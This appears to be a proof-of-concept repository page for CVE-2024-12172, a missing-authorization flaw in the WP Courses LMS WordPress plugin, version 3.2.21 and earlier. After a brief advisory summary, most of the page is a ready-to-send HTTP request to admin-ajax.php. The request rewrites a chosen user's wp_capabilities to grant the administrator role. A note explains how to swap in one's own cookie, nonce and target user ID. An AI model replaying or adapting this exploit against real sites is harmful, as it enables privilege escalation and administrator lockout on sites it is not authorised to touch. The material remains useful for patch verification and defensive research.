来源

关联漏洞

描述

WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses <= 3.2.21 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Meta Update

介绍

# CVE-2024-12172
WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses <= 3.2.21 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Meta Update

# Description

The WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpc_update_user_meta_option() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary user's metadata which can be levereged to block an administrator from accessing their site when wp_capabilities is set to 0.

## Details

- **Type**: plugin
- **Slug**: wp-courses
- **Affected Version**: 3.2.21
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
- **CVE**: CVE-2024-12172
- **Status**: Active

POC
---

Notes: Grab Security none once logged in change the cookie to yours and change the ID of the user you wish to mess up.

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=xxxxxx%7C1734564259%7CqjA3YsV7vjM7q3xj2PMjfPNu99lImJXyJ75qtYZpZ7Y%7Ce3a77e785ddd92cd3be1cf8c0eb8d553e5daef113144193bed0f02383200b15c; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AvR7YQZfotoLbsTF9AhmUVwUJ; PHPSESSID=bf585dabe58fb6cf2f5f52eb40caea09; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-12-16%2021%3A32%3A49%7C%7C%7Cep%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2Fwpr%2Fmigrated-form%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwpr; sbjs_first_add=fd%3D2024-12-16%2021%3A32%3A49%7C%7C%7Cep%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2Fwpr%2Fmigrated-form%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwpr; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D2%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A133.0%29%20Gecko%2F20100101%20Firefox%2F133.0; wp_lang=en_US; sbjs_session=pgs%3D38%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fwp-dev.ddev.site%2F; tk_qs=; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=xxxxxx%7C1734564259%7CqjA3YsV7vjM7q3xj2PMjfPNu99lImJXyJ75qtYZpZ7Y%7C8fbeacbf59bdbe9d5dd58f11d538be09210c86d5742b92993b6c2827ec0a53bb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-login.php?loggedout=true&wp_lang=en_US
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

security=91f7dcda05&action=wpc_update_user_meta&user_id=7&meta_key=wp_capabilities&meta_value=a%3a1%3a{s%3a13%3a"administrator";b:1;}
```

文件快照

 [4.0K]  /data/pocs/1227fe1550a28090de17297f5dfba8a82710e1b3
└── [3.6K]  README.md

0 directories, 1 file

备注